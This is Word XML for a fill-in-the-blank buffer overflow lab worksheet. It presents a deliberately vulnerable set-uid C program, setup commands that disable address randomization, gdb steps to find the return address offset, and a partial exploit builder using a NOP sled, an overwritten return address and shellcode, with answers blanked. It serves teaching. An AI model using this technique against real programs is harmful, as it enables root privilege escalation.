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B006" w14:textId="77777777" w:rsidR="00F5039B" w:rsidRPr="00914334" w:rsidRDefault="007762D6" w:rsidP="00914334">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Buffer Overflow Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBADEC" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="00914334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C051C" w14:textId="53570F17" w:rsidR="007762D6" w:rsidRDefault="003911C9" w:rsidP="003911C9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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DEAB647" wp14:editId="6D423F1E">
                <wp:extent cx="6103620" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="11430" b="1714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821AC5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/* stack.c */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7249C8F0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/* This program has a buffer overflow vulnerability. */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="13AE8312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#include &lt;stdlib.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="28E701F6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#include &lt;stdio.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="442075CC" w14:textId="1B52B68E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#include &lt;string.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C53FA10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 foo(char *str)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2CAD0152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04186189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char buffer[100];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="366287D5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D01BFA8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/* The following statement has a buffer overflow problem */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11F8F716" w14:textId="71887814" w:rsid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strcpy(buffer, str);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="706C7AA3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72BAFC2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return 1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E0766BB" w14:textId="7809641D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CFCD2F3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int main(int argc, char **argv)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3A359BE7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</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35AACEDA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char str[400];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="281A8163" w14:textId="344B7FDB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FILE *badfile;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1BE2835E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badfile = fopen("badfile", "r");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BD65CCD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fread(str, sizeof(char), 300, badfile);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75D57212" w14:textId="24260BF0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foo(str);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18862463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printf("Returned Properly\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D2EA994" w14:textId="77777777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return 1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B5024A0" w14:textId="322C74C6" w:rsidR="003911C9" w:rsidRPr="003911C9" w:rsidRDefault="003911C9" w:rsidP="003911C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911C9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EAB6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80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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="38821AC5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/* stack.c */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7249C8F0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/* This program has a buffer overflow vulnerability. */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="13AE8312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#include &lt;stdlib.h&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="28E701F6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#include &lt;stdio.h&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="442075CC" w14:textId="1B52B68E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#include &lt;string.h&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C53FA10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 foo(char *str)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2CAD0152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</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="04186189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char buffer[100];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="366287D5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D01BFA8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/* The following statement has a buffer overflow problem */</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11F8F716" w14:textId="71887814" w:rsid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strcpy(buffer, str);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="706C7AA3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72BAFC2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return 1;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E0766BB" w14:textId="7809641D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6CFCD2F3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int main(int argc, char **argv)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3A359BE7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</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35AACEDA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char str[400];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="281A8163" w14:textId="344B7FDB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FILE *badfile;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1BE2835E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badfile = fopen("badfile", "r");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5BD65CCD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fread(str, sizeof(char), 300, badfile);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="75D57212" w14:textId="24260BF0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foo(str);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18862463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printf("Returned Properly\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D2EA994" w14:textId="77777777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return 1;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0B5024A0" w14:textId="322C74C6" w:rsidR="003911C9" w:rsidRPr="003911C9" w:rsidRDefault="003911C9" w:rsidP="003911C9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911C9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DCDCDC" w14:textId="77777777" w:rsidR="00D659A2" w:rsidRDefault="00D659A2" w:rsidP="00746EC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B11CE06" w14:textId="77777777" w:rsidR="00F77581" w:rsidRDefault="007762D6" w:rsidP="00914334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65197772" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="007762D6" w:rsidP="00F77581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Turn off address randomization (countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D084441" w14:textId="02A37D2D" w:rsidR="00FE5D88" w:rsidRDefault="007762D6" w:rsidP="00FE5D88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88">
        <w:t xml:space="preserve">sudo sysctl -w </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F4468" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D603EF7" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Compile set-uid root version of stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C8D3B" w14:textId="080A3907" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88" w:rsidRPr="00FE5D88">
        <w:t xml:space="preserve">gcc -o stack -z </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>________________________</w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88" w:rsidRPr="00FE5D88">
        <w:t xml:space="preserve"> stack.c</w:t>
      </w:r>
      <w:r w:rsidR="0005590A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> _____</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A2E1E2" w14:textId="77777777" w:rsidR="00FE5D88" w:rsidRDefault="00FE5D88" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D88">
        <w:t>sudo chown root stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C05F97" w14:textId="77777777" w:rsidR="00FE5D88" w:rsidRDefault="00FE5D88" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D88">
        <w:t>sudo chmod 4755 stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FD815" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB16843" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="00F77581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Configure /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF98285" w14:textId="3BC0EC18" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88" w:rsidRPr="00FE5D88">
        <w:t xml:space="preserve">sudo ln -sf </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>______</w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88" w:rsidRPr="0005590A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE5D88" w:rsidRPr="00FE5D88">
        <w:t>/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210FA4B" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="00914334" w:rsidP="00914334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305EB7C9" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task A: </w:t>
      </w:r>
      <w:r w:rsidRPr="007762D6">
        <w:t>Distance Between Buffer Base Address and Return Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD57C3" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="003A2F7C" w:rsidP="003A2F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Recompile stack.c by adding the debugging information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCA117" w14:textId="1E57C95D" w:rsidR="003A2F7C" w:rsidRDefault="00DC632D" w:rsidP="003A2F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC632D">
        <w:t xml:space="preserve">gcc -o stack_gdb </w:t>
      </w:r>
      <w:r w:rsidR="002235D5" w:rsidRPr="002235D5">
        <w:rPr>
          <w:color w:val="AA0000"/>
        </w:rPr>
        <w:t>_________ _________</w:t>
      </w:r>
      <w:r w:rsidRPr="002235D5">
        <w:rPr>
          <w:color w:val="AA0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC632D">
        <w:t xml:space="preserve">stack.c </w:t>
      </w:r>
      <w:r w:rsidR="002235D5" w:rsidRPr="002235D5">
        <w:rPr>
          <w:color w:val="AA0000"/>
        </w:rPr>
        <w:t xml:space="preserve">____   ______ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191CD39D" w14:textId="77777777" w:rsidR="00CD7785" w:rsidRDefault="00CD7785" w:rsidP="003A2F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>$ touch badfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEE2DD" w14:textId="77777777" w:rsidR="003A2F7C" w:rsidRDefault="003A2F7C" w:rsidP="003A2F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4481EDEF" w14:textId="77777777" w:rsidR="003A2F7C" w:rsidRDefault="003A2F7C" w:rsidP="003A2F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Debug the code to find the distance and the address of $ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791C5C3" w14:textId="77777777" w:rsidR="00DC632D" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED47DA">
        <w:t>$ gdb ./stack_gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5CB5D0" w14:textId="77777777" w:rsidR="00ED47DA" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">gdb-peda$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED47DA">
        <w:t>b foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B7BC97" w14:textId="77777777" w:rsidR="00ED47DA" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>gdb-peda$ r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAA007" w14:textId="77777777" w:rsidR="00215748" w:rsidRDefault="00215748" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdb-peda$ n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A2F12" w14:textId="4822E63A" w:rsidR="00ED47DA" w:rsidRPr="0005590A" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdb-peda$ </w:t>
      </w:r>
      <w:r w:rsidR="005B1174" w:rsidRPr="005B1174">
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C8933" w14:textId="692B3D94" w:rsidR="00EB7E39" w:rsidRDefault="00EB7E39" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB7E39">
        <w:t xml:space="preserve">$1 = (char (*)[100]) </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00484432" w14:textId="09B34026" w:rsidR="00ED47DA" w:rsidRPr="0005590A" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>gdb-peda$</w:t>
      </w:r>
      <w:r w:rsidR="005B1174">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B1174" w:rsidRPr="005B1174">
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>__________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CDD65" w14:textId="7BD85C7B" w:rsidR="00EB7E39" w:rsidRDefault="00EB7E39" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB7E39">
        <w:t xml:space="preserve">$2 = (void *) </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>__________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76647A" w14:textId="11F86914" w:rsidR="00EB7E39" w:rsidRPr="0005590A" w:rsidRDefault="00ED47DA" w:rsidP="00EB7E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>gdb-peda$</w:t>
      </w:r>
      <w:r w:rsidR="00CD7785">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB7E39">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00800611">
        <w:t>/d</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>______________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF97D0D" w14:textId="33E025AF" w:rsidR="00ED47DA" w:rsidRPr="0005590A" w:rsidRDefault="00EB7E39" w:rsidP="00EB7E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$3 = </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F48AC" w14:textId="77777777" w:rsidR="00ED47DA" w:rsidRDefault="00ED47DA" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD3A602" w14:textId="6A5BFF96" w:rsidR="00EB7E39" w:rsidRDefault="00EB7E39" w:rsidP="00DC632D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distance between buffer[0] and return address is </w:t>
      </w:r>
      <w:r w:rsidR="002235D5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_____________</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1494650F" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF5AB1F" w14:textId="77777777" w:rsidR="007762D6" w:rsidRDefault="007762D6" w:rsidP="007762D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task B: </w:t>
      </w:r>
      <w:r w:rsidRPr="007762D6">
        <w:t>Address of Malicious Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2805B" w14:textId="77777777" w:rsidR="00914334" w:rsidRDefault="00873E1A" w:rsidP="00873E1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initialize buffer with NOP (instruction that does nothing) instruction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2F075" w14:textId="77777777" w:rsidR="00873E1A" w:rsidRDefault="00873E1A" w:rsidP="00873E1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Guess the address of malicious code: address of return address + offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFAAB2" w14:textId="77777777" w:rsidR="00873E1A" w:rsidRDefault="002D0FC9" w:rsidP="00873E1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">May need to try different offset (i.e., </w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>20/</w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>40/</w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>60/</w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>80/</w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>100/</w:t>
      </w:r>
      <w:r w:rsidR="00CE489D">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>120/…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295DA6E" w14:textId="6CCD1E4B" w:rsidR="002D0FC9" w:rsidRDefault="002D0FC9" w:rsidP="00800611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: the new address in the return address should NOT contain zero in any of its </w:t>
      </w:r>
      <w:r w:rsidR="00800611">
        <w:t>bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9A95F" w14:textId="77777777" w:rsidR="002D0FC9" w:rsidRDefault="00AF59EE" w:rsidP="002D0FC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F4F183" wp14:editId="468D6D9F">
                <wp:extent cx="5491162" cy="5934075"/>
                <wp:effectExtent l="0" t="0" r="14605" b="254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1162" cy="5934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CFAFBB" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                            <w:pPr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>void main(int argc, char **argv)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46958D4C" w14:textId="77777777" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="00AF59EE">
                            <w:pPr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>{</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="725A79E4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char buffer[200];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="57C27B23" w14:textId="6B2D4DC0" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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FILE *badfile;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AFACD2C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/* A. Initialize buffer with </w:t>
                            </w:r>
                            <w:r w:rsidRPr="002235D5">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t xml:space="preserve">0x90 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AF59EE">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>(NOP instruction) */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="61A2172A" w14:textId="7972D950" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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memset(&amp;buffer, </w:t>
                            </w:r>
                            <w:r w:rsidRPr="002235D5">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>0x90</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AF59EE">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>, 200);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="225F9095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/* B. Fill the return address field with a candidate </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="473A744D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      entry point of the malicious code */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="344E30B3" w14:textId="1EF3FDF5" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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*((long *) (buffer + </w:t>
                            </w:r>
                            <w:r w:rsidR="002235D5">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>______</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AF59EE">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t xml:space="preserve">)) = </w:t>
                            </w:r>
                            <w:r w:rsidR="00821970" w:rsidRPr="00821970">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>0xffffcf48</w:t>
                            </w:r>
                            <w:r w:rsidR="00821970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2235D5">
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> __________</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AF59EE">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36AF074A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// C. Place the shellcode towards the end of buffer</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E0CFCAB" w14:textId="374D3CCB" w:rsidR="00AF59EE" w:rsidRPr="00AF59EE" w:rsidRDefault="00AF59EE" w:rsidP="003911C9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memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3346019E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/* Save the contents to the file "badfile" */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1FB8C78B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badfile = fopen("./badfile", "w");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0ECBDB5E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fwrite(buffer, 200, 1, badfile);</w:t>
                            </w:r>
                          </w:p>
